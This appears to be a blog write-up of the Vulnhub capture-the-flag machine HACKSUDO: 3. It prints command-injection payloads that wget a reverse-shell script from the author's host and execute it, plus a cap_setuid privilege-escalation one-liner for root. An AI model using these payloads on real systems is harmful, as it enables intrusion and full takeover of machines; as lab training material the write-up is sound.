Vulnhub: HACKSUDO: 3
HACKSUDO: 3
This is HACKSUDO: 3 from Vulnhub. It says:
This box should be easy. This machine was created for the InfoSec Prep Discord Server (https://discord.gg/tsEQqDJh), and
Find the user.txt and root.txt flags, submit them to the mybox channel on Discord, and get a chance to get the hacksudo machine hacking course free.
I don’t normally post these anywhere but hey, maybe I will this time.
Ports
LOL. The first time I scanned this I only had a web port (HTTP on 80). After I completed it I scanned it again and SSH was open. Whaaaaaat? I don’t think I opened it; maybe I was too quick on the scan. Whatever, we start with web.
HTTP/80
The website has a few things on it; it mostly presents as a copy of a GitHub project, but some enumeration reveals JavaScript files related to games and a few PHP files, including info.php, login.php and generator.php. We don’t have any credentials, so I ignore login.php; I run a bunch of feroxbuster scans but don’t find anything interesting.
generator.php
This is a page that allows you to enter a name, which it then renders in ASCII art. Neat. It is also vulnerable to command injection, e.g.:
name && id
Which produces:
‘name’ as ASCII art, and
uid=33(www-data) gid=33(www-data) groups=33(www-data)
I try a few one-liner reverse shells but I can’t get one to fire. I try using echo to write a file on the webserver; the file gets created but it’s empty. I try with printf; same thing. Next I try using curl and wget to retrieve a shell from my box, e.g. (this is from Burp Suite):
ip=id && wget http://192.168.1.192:9090/cmd.php -O /var/www/html/cmd.php&submit=submit
This will create the file, but it’s empty, so no bueno. I try again but placing the file in the /tmp directory; still empty. I try /dev/shm - success! The sequence is:
Upload the file (this was just a bash reverse shell):
ip=id && wget http://192.168.1.192:9090/shell.sh -O /dev/shm/shell.sh
Now make it executable:
ip=id && chmod +x /dev/shm/shell.sh&submit=submit
And now call it:
ip=id && /dev/shm/shell.sh&submit=submit
And in my listener:
hacksudo
I have a look in the webserver; turns out my feroxbuster searches found most of the content. I check login.php and find this line:
you have logged in successfully , 0x Open The Next Door key is = GMYTGMBTGAZTAMZRGIYDGMJTGAZTAMZQGMZDEMBTGEZTAMZQGMYDGMY=
But even now I’ve rooted the box I’m still not sure what that means.
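As an added example (not part of the original post), the key can be unwrapped mechanically: it is valid base32, and the bytes it yields are themselves hex digits, so a second decode is needed. The final result is three numbers in port range; reading them as a knock sequence is this example's inference, not something the post confirms.

```python
import base64
import string

# The "Open The Next Door" key printed by login.php, copied from the post.
NEXT_DOOR_KEY = "GMYTGMBTGAZTAMZRGIYDGMJTGAZTAMZQGMZDEMBTGEZTAMZQGMYDGMY="
HEX_DIGITS = set(string.hexdigits)


def decode_one_layer(text: str):
    """Undo one hex or base32 layer; return None if text is neither."""
    compact = "".join(text.split())
    try:
        if compact and len(compact) % 2 == 0 and set(compact) <= HEX_DIGITS:
            decoded = bytes.fromhex(compact).decode("ascii")
        else:
            # Restore the '=' padding that copy/paste often drops.
            padded = compact.upper() + "=" * (-len(compact) % 8)
            decoded = base64.b32decode(padded).decode("ascii")
    except ValueError:  # bad alphabet, bad padding, or non-ASCII output
        return None
    return decoded if decoded.isprintable() else None


def peel_layers(text: str, max_layers: int = 4) -> list:
    """Strip nested encodings; return every intermediate result, innermost last."""
    layers = []
    current = text
    for _ in range(max_layers):
        decoded = decode_one_layer(current)
        if decoded is None:
            break
        layers.append(decoded)
        current = decoded
    return layers


def knock_like_ports(plaintext: str) -> list:
    """Return the integers in plaintext when every token is a valid port."""
    tokens = plaintext.split()
    if tokens and all(t.isdigit() and 0 < int(t) < 65536 for t in tokens):
        return [int(t) for t in tokens]
    return []


if __name__ == "__main__":
    layers = peel_layers(NEXT_DOOR_KEY)
    for depth, layer in enumerate(layers, start=1):
        print(f"layer {depth}: {layer}")
    # Three numbers in port range resemble a knock sequence (an inference).
    print("port-like tokens:", knock_like_ports(layers[-1]) if layers else [])
```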
One level up in /var/www, we find this:
I won’t reproduce it here, but we have a ROT13 encoded file, which contains SSH credentials for hacksudo (the password is hashed, but John deals with it).
But, we had no open SSH port? What about internally? Yes. I couldn’t get it to work with the normal commands but using IPv6 it was ok, not sure if that was intentional or not.
root
There are multiple ways of escalating to root on this box and I know that because after I’d done this, I watched a YouTube video of someone else doing the box and he used the LXD privesc which was much more complicated than what I did.
Linpeas points this out:
And GTFOBins lights the way:
Cool.
Since I knew there was at least one other method for getting root, I went to look to see if I could find another one. I noticed linpeas pointed out that view also had the cap_setuid capability. Would that work - we have a method at GTFOBins?
Yes, it does work - with a slight modification. Note: there are several different view binaries on the box. We want this one:
/home/hacksudo/view cap_setuid=ep
Trying it directly (more or less) from GTFOBins:
hacksudo@hacksudo:~$ ./view -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
provokes this error:
reset: unknown terminal type unknown
In order to fix this, I changed a few things. Firstly, SSH with -t (this may not have been necessary):
www-data@hacksudo:/var/www/html$ ssh -6 -t hacksudo@localhost
Next, check (and then set) TERM:
And finally:
hacksudo@hacksudo:~$ ./view -c ':python3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
Boom.
So; two ways to root and both different from the video I watched.